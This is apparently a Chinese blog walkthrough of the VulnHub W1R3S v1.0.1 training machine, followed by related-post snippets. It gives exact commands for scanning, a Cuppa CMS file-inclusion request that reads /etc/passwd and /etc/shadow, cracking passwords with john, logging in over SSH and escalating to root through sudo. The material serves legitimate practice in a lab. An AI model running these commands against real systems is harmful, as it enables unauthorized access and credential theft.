W1R3S.v1.0.1靶机渗透测试

最新推荐文章于 2024-09-12 09:59:28 发布
最新推荐文章于 2024-09-12 09:59:28 发布
阅读量385 收藏 9
点赞数 6
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140935464
版权

一、靶机下载地址

https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:77:F1:35"

2、端口扫描

# 使用命令
nmap 192.168.145.191 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.191

4、目录扫描

# 使用命令
dirsearch -u  "http://192.168.145.191"

三、获取shell

1、访问靶机IP地址

2、拼接访问目录扫描出的目录/administrator

3、这是一个数据库的安装创建,但不知道密码和数据库名,观察到最上面的网页标题为Cuppa CMS,可以通过它来 搜索一下它的历史漏洞,来进行利用,使用searchsploit工具来搜索Cuppa所存在的历史漏洞

# 使用命令
searchsploit cuppa

4、将25971.txt导入到当前目录下

# 使用命令
searchsploit -m php/webapps/25971.txt

5、查看文件内容,查看利用方式,文件中描述说,/alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件

# 使用命令
cat 25971.txt

6、在网页上面进行尝试访问,发现没有回显结果

7、用curl 尝试看可不可以下载下来

# 使用命令
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.145.191/administrator/alerts/alertConfigField.php

8、在文件中发现了 w1r3s 用户,用同样的方法获得存密码的shadow文件试试,发现了 rootwww-dataw1r3s用户的密码

# 使用命令
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.145.191/administrator/alerts/alertConfigField.php

9、将密码存到一个文件中进行爆破

# syml
vim password.txt

cat password.txt

10、使用john工具进行爆破,爆破结果:www-data:www-dataw1r3s:computer

# 使用命令
john password.txt

11、使用ssh进行远程连接,发现w1r3s用户连接成功

# 使用命令
ssh w1r3s@192.168.145.191

四、提权

1、输入sudo -l命令查看可执行的命令,发现所有命令都可执行

2、写一个 sh 文件,赋权并以 sudo 命令执行,成功提权

# 使用命令
echo '/bin/bash' >> root.sh

chmod +x root.sh

sudo ./root.sh

3、在/root目录下找到了flag.txt文件

果冻*果冻*
关注
5-vulnhub W1R3S 1
weixin_45345568的博客
06-29 1066
5-vulnhub W1R3S 1 下载地址为:https://www.vulnhub.com/entry/w1r3s-101,220/ 本次的靶机ip为192.168.3.24(桥接模式自动获取) 目标:得到root权限 找到flag 一、信息搜集 1.扫描目标ip,这里使用arp-scan -l 2.扫描端口,这里使用nmap 命令为nmap -p 1-65535 -sV 192.168.3.24 nmap -p 1-65535 -sV 192.168.3.24 Starting Nmap 7.70
BOB1.0.1靶机渗透攻略.pdf
09-21
靶机 Bob 1.0.1 可以在 VulnHub 上找到,这是一个提供实战环境的网站,允许用户下载靶场并进行渗透测试。 渗透攻击过程首先需要使用 Nmap 工具进行扫描,Nmap 是一款强大的网络扫描工具,可以用来发现网络上的主机...
靶机渗透】w1r3s.v1.0.1靶机渗透练习
serendipity1130的博客
08-30 605
靶机描述:您受雇在W1R3S.inc个人服务器上进行渗透测试并报告所有结果。他们要求您获得root访问权限并找到标志(位于/root目录中) 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.142 2.扫描端口 nmap 192.168.225.142 -sV -sC -Pn -n -v -T5 -p- 3.使用gobuster扫到后台路径: gobuster dir -u http://192.168.225.154/ -w /usr/share/wordl.
w1r3s.v1.0.1靶机
weixin_71232352的博客
08-06 404
w1r3s.v1.0.1靶机
vulnhub靶场——W1R3S: 1.0.1
Czheisenberg的博客
12-16 684
ftp匿名登录。Cuppa CMS 存在文件包含漏洞。/etc/passwd 和 /etc/shadow 的利用/etc/shadow 可破解。
VulnHub-W1R3S: 1.0.1渗透学习
我是小小白的博客
07-09 494
VulnHub-W1R3S: 1.0.1渗透学习 前言 靶机地址:https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip 靶机难度:初级(CTF) 靶机发布日期:2018 年 2 月 5 日 靶机描述:您受雇在 W1R3S.inc 个人服务器上进行渗透测试并报告所有结果。他们要求您获得 root 访问权限并找到标志(位于 /root 目录中); 目标:得到root权限&找到flag.txt 作者:我是小小白 时间:2021-07-09 请注意: 本博客
zTouch:Zepto.js v1.0.1 touch extend (Zepto.js v1.0.1 swipetouch扩展)
06-13
* Zepto.js v1.0.1 touch extend (Zepto.js v1.0.1 swipe/touch扩展) Zepto.js v1.0.1版本的touch.js模块引入使用后会导致页面很卡的情况,所以开发了一个新的扩展插件来替换其touch.js。已经过Android/ios测试。 * ...
EA.Mobile.FIFA.09.v1.0.1.S60v3
12-17
《EA.Mobile.FIFA.09.v1.0.1.S60v3》是一款由著名游戏开发商Electronic Arts(简称EA)推出的移动版FIFA 09足球游戏,专为S60v3平台设计,支持Symbian OS 9操作系统。这款游戏在手机平台上提供了与家用主机和PC版...
Nationstech.N32G45x_DFP.1.0.1.pack
12-11
keil.for .nations
jmeter.backendlistener.kafka-1.0.1.jar
08-23
jmeter后端侦听器kafka 一个JMeter插件,使您可以将测试结果发送到Kafka服务器
打靶:vulnhub中的w1R3S
qq_73865998的博客
04-03 1943
复现视频:【「红队笔记」靶机精讲:W1R3S 1.0.1 - 渗透测试思路为王,细节多到即使对于纯萌新也能无感入圈。红队笔记(一个很宝藏的up主)。
红队渗透靶场之W1R3S靶场(超详细!)
xf555er的博客
11-24 3306
- nmap的基本使用 - 目录爆破工具的使用 - CMS漏洞的利用 - Linux用户的简单提权
VulnHub-W1R3S: 1.0.1-靶机渗透学习
嗯嗯呐的博客
11-21 1694
**靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 靶机难度:中等(CTF) 靶机描述:你被雇来对W1R3S渗透测试。公司个人服务器并报告所有发现。他们要求您获得root权限并找到标志(位于/root目录中)。 目标:得到root权限目录信息收集LFI漏洞利用john密码破解提权总结 信息收集 Nmap ip扫描,确认靶机IP地址 Namp 端口扫描 21 FTP协议(可以匿名访问) 22 SSH 80 http 3306 mysql 先
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 919
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1431
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1813
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全实训八(y0usef靶机渗透实例)
最新发布
Wrop的博客
09-12 180
y0usef靶机渗透实例
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-09 1383
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
v1.0.1.bin
08-12
v1.0.1.bin是一个文件的命名,它的名称中以“v1.0.1”表示版本号,后缀“.bin”表示二进制文件的格式。 版本号“v1.0.1”通常用于软件或程序的版本控制,它表示该版本是在第一个主要版本(v1)的基础上进行的更新,次要版本(0)表示更小的变动或修复,补丁版本(1)表示更小的更新或修复。 后缀“.bin”表示这是一个二进制文件。二进制文件储存的是机器语言代码,可以在计算机上直接执行。与文本文件不同,二进制文件不以可读的字符形式呈现,而是一连串的01二进制数据,其中包含了程序的指令和数据。 在软件开发中,通过不同的版本号和文件格式的命名,可以方便地标识和管理不同的软件版本或文件类型。v1.0.1.bin可能是某个软件的特定版本的二进制文件,用于安装、更新或运行该软件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值